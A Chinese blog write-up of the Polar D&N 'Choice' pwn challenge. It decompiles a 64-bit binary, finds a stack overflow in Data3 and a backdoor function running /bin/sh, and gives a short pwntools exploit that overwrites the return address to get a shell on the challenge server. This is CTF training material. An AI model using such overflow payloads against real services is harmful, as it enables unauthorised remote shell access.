Polar_D&N_PWN_Choice

最新推荐文章于 2024-08-27 17:50:25 发布
最新推荐文章于 2024-08-27 17:50:25 发布
阅读量131 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73720466/article/details/133845929
版权

一、查看题目信息

$ file Choice
$ checksec Choice

程序为64位elf文件,没有开启任何保护。

二、题目分析

将程序放到ida 里分析,查看main()函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF
 
  init(argc, argv, envp);
  puts(&s);
  puts("Menu:");
  puts(a1);
  puts(a2);
  puts(a3);
  __isoc99_scanf((__int64)&unk_400A75, (__int64)&v4);
  if ( v4 == 1 )
  {
    Data1();
  }
  else if ( v4 == 2 )
  {
    Data2();
  }
  else
  {
    Data3();
  }
  return 0;
}

发现Data1()函数和Data2()和Data3()函数。

先进入`Data1()函数中:

int Data1()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400A78);
  read(0, buf, 0x35uLL);
  return printf(&format);
}
​

没有发现问题。

进入Data2()

int Data2()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400AA8);
  read(0, buf, 0x35uLL);
  return printf(&format);
}

接着进入Data3()函数中分析:

int Data3()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400AD0);
  read(0, buf, 0x50uLL);
  return printf(&format);
}

我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。

同时我们发现函数中存在后门函数shell

int Shell()
{
  return system("/bin/sh");
}

三、解题思路

那么,这道题的大致思路已经明了

1、选择Data3(见ps)

2、构造栈溢出

3、getshell

那么久直接开始写脚本吧

四、编写脚本

EXP

from pwn import*
r = remote("123.60.135.228",2144)
r.sendline("9")
shell = 0x004007bd
payload = 'a' * 48 + 'a' * 8
payload += p64(shell)
r.sendline(payload)
r.interactive()
m0_73720466
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
polar_matlabpolar_matlab_polarcode_Polar_matlab_polar_源码
10-02
在 MATLAB 环境中,Polar 代码是一种用于信道编码的重要技术,它由艾里·阿龙森(Eli Arikan)于2009年提出。Polar 代码利用信道极化现象,使得信息能够在经过编码后通过信道传输时,能够达到接近香农极限的错误纠正...
pp.rar_polar_polar si8000
09-23
标题中的“pp.rar_polar_polar si8000”暗示了这是一份与Polar编码相关的学习资源,其中可能包含对Polar码技术的详细解释。Polar码是一种先进的错误纠正编码技术,由土耳其科学家艾尔达尔·阿里坎在2008年提出。这种...
polar代码MATLAB (1).rar_Matlab代码_Polar码_polar_polar coding_sc译码
07-14
1. 构建Polar码生成矩阵:通常使用N×N的BCH矩阵,N是编码长度。 2. 输入信息比特:根据编码率,确定信息比特的数量,并将其与生成矩阵相乘得到编码比特序列。 3. 冻结位设置:将某些位(根据信道条件)设定为已知值...
BICM_Polar_TVT.zip_BICM polar_polar_polar BICM_polar code
07-15
Polar code for bicm channels
MCS.13TransmissionLines.rar_polar_polar code
09-21
在IT领域,尤其是在通信工程和数字信号处理中,"Polar Code"是一种重要的编码技术,主要应用于纠错编码和数据传输。本压缩包文件"MCS.13TransmissionLines.rar"聚焦于Polar码在传输线(Transmission Lines)中的应用...
软件测试学习笔记丨Pytest配置文件
ceshiren_com的博客
08-27 1035
pytest.ini是pytest的配置文件;可以修改pytest的默认行为;不能使用任何中文符号,包括汉字、空格、引号、冒号等。
MySQL 相关知识笔记
weixin_68929783的博客
08-23 1754
以上是根据 B 站黑马课程学习后的 MySQL 笔记,为了日后复习和给别人参考而整理,希望对大家有所帮助。同时,在实际应用中,还需要根据具体情况合理使用索引、约束等功能,以提高数据库的性能和数据的完整性。
[Matsim]Matsim学习笔记-车辆和订单匹配的逻辑
机器学习菜鸟
08-23 313
这个方法体现了在DRT系统中对未计划请求进行调度的逻辑,包括对旧请求的重试和新请求的调度。通过并行处理车辆入口信息的创建,提高了调度过程的效率。matsim扩展包中DRT动态线路的场景是,给定一些车辆、一些订单,进行车辆和订单的匹配,类似滴滴的拼车功能。的方法,它用于调度未计划的DRT(需求响应交通)请求。操作,确保了在调度过程中对已处理的请求进行清理,避免重复调度。
阅读笔记5:董超底层视觉之美|时空的交错与融合——论视频超分辨率
BigerBang的博客
08-24 1069
本文是董超老师底层视觉之美系列的笔记,本篇主要是对视频超分进行了总结和回顾:基于Cnn的方案、基于transformer的方案、基于生成模型的方案(gan、diffusion)
数据结构(邓俊辉)学习笔记】优先级队列 08——左式堆:结构
weixin_44399845的博客
08-23 1123
学习左式堆的结构
zigbee笔记、十五、组播通信原理
Devlin_的博客
08-25 1060
3、组播:在zigbee网络中,模块可以用分组来标记,发送的模块如果发送的组号和网络里面标记接收模块的组号相对应,那么这些模块就可以拿到这些无线数据包(组播通信与广播通信相似,单个发送设备可以同时向多个接收设备发送数据)。4、组标记中,同一个模块定义的一个组编号可以关联多个可用的端点(一个组标记可以使使用多个端点),同一个端点也可以关联多个组编号(即一个模块可以同时是组1和组2的模块,同属于2个组)。,它的作用时去除当前端点所关联的组编号。(也在组头文件中有声明),它的作用是将我们的端点与组关联起来。
笔记redis
风止的博客
08-22 1434
Redis(Remote Dictionary Server)是用C语言开发的一个基于的数据库。
Joplin笔记冲突解决方案
小歆CSDN博客
08-26 145
顶部菜单 工具-》选项-》插件 搜索 Conflict Resolution安装。选择冲突文件,右击 点击Conflict选项出现如下图所示,冲突解决类似git 左右对比。
GB28181 SDP协议学习笔记
最新发布
yjkhtddx的专栏
08-27 533
其中第一位为历史或者实时媒体流的标识位,0为实时,1为历史;第2位到第6位取20位SIP监控域ID之中的4-8位作为域标识;第7-10位作为域内媒体流标识,是一个与当前域内产生的媒体流SSRC值后4位不重复的四位十进制整数。"v="字段表示会话描述协议的版本。本文定义的版本为0,没有次版本号。当回放或者下载时,t行值为开始时间,结束时间,采样" "分隔。"Playback"代表历史回放。"Download"代表文件下载。"Talk"代表语音对讲。"Play"代表实时点播。
谷粒商城实战笔记-236~238-商城业务-购物车-环境搭建
epitomizelu的专栏
08-22 926
这一节的内容主要分析购物的业务逻辑和设计存储购物车的选型及数据结构。①把整个购物车封装为一个对象CartVo。
【思源笔记】思源笔记配置S3同步
慕雪华年的博客
08-23 1197
思源笔记是一款由国人开发的本地优先,支持双链、块级的开源笔记软件。思源笔记采用json作为数据存储格式,编辑器兼容MarkDown语法且编辑体验极佳(堪比Typora)。最重要的是,自带同步功能。它是我目前使用过的所有笔记软件中,最适合个人多设备使用的笔记软件,既能简单的实现多设备同步,又能保证数据本地化,不受在线笔记产品会员资费、云服务宕机的困扰。思源笔记基础版本提供了几乎所有笔记相关的功能,会员版本分为永久买断功能特性和年付订阅,详见价格页面。
Golang学习笔记-Golang中的锁
qq_24428851的博客
08-25 1082
Go标准库的中的sync.Cond是一个条件变量,它可以让一系列的goroutine都在满足特定条件下时候被唤醒,每一个 sync.Cond 结构体在初始化时都需要传入一个互斥锁,我们可以通过下面的例子了解它的使用方法。因为请求的哈希在业务上一般表示相同的请求,所以上述代码使用它作为请求的键。这个是Go语言的扩展包中提供的另外一个信号量,它能够在一个服务中抑制对下游的多次重复请求,比如在redis的缓存雪崩中,能够限制对同一个 Key 的多次重复请求,减少对下游的瞬时流量。上述两个加起来,只占用8个字节。
《计算机操作系统》(第4版)第8章 磁盘存储器的管理 复习笔记
m0_70617423的博客
08-23 849
外存的组织方式 文件存储空间的管理 提高磁盘I/O 速度的途径 提高磁盘可靠性的技术 数据一致性控制
AUTOSAR_EXP_ARAComAPI.pdf的第4章笔记
weixin_42108533的博客
08-24 659
为了理解AUTOSAR_EXP_ARAComAPI.pdf的第4章内容,生搬硬套的翻译了一把,准备先囫囵吞枣,再仔细理解。因为这些内容的理解也不是一时半会儿的。所以先放上来。
polar_opts
11-14
以下是关于polar_opts的介绍和演示: polar_opts是pyecharts中极坐标图的配置项,可以通过设置polar_angleaxis_opts和polar_radiusaxis_opts来调整极坐标图的角度轴和半径轴的样式和属性。例如,可以通过设置polar_angleaxis_opts的boundary_gap属性来控制角度轴的起始位置和结束位置是否留白,还可以通过设置polar_radiusaxis_opts的min和max属性来控制半径轴的最小值和最大值。 以下是一个简单的例子,展示如何使用polar_opts来绘制一个极坐标图: ```python from pyecharts import options as opts from pyecharts.charts import Polar data = [("A", 10), ("B", 20), ("C", 30), ("D", 40), ("E", 50)] angle_data = [item[0] for item in data] radius_data = [item[1] for item in data] polar = ( Polar() .add("", [list(z) for z in zip(angle_data, radius_data)]) .set_global_opts(title_opts=opts.TitleOpts(title="极坐标图")) .set_series_opts(label_opts=opts.LabelOpts(is_show=False)) .set_colors(["#FF3333", "#FFFF33", "#33FF33", "#33FFFF", "#3333FF"]) .set_polar( radius="60%", center=["50%", "50%"], start_angle=0, split_number=5, name_gap=20, boundary_gap=True, scale_tick=1, area_color_opacity=0.5, areastyle_opts=opts.AreaStyleOpts(opacity=0.5), angleaxis_opts=opts.AngleAxisOpts( boundary_gap=True, start_angle=0, min_interval=10, max_interval=30, axislabel_opts=opts.LabelOpts(is_show=True, color="#333"), axisline_opts=opts.LineOpts(is_show=True, linestyle="dashed", color="#aaa"), axistick_opts=opts.AxisTickOpts(is_show=True, length=5, linestyle="solid", color="#aaa"), splitline_opts=opts.SplitLineOpts(is_show=True, linestyle="dashed", color="#aaa"), ), radiusaxis_opts=opts.RadiusAxisOpts( min_=0, max_=50, interval=10, axislabel_opts=opts.LabelOpts(is_show=True, color="#333"), axisline_opts=opts.LineOpts(is_show=True, linestyle="dashed", color="#aaa"), axistick_opts=opts.AxisTickOpts(is_show=True, length=5, linestyle="solid", color="#aaa"), splitline_opts=opts.SplitLineOpts(is_show=True, linestyle="dashed", color="#aaa"), ), ) ) polar.render_notebook() ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值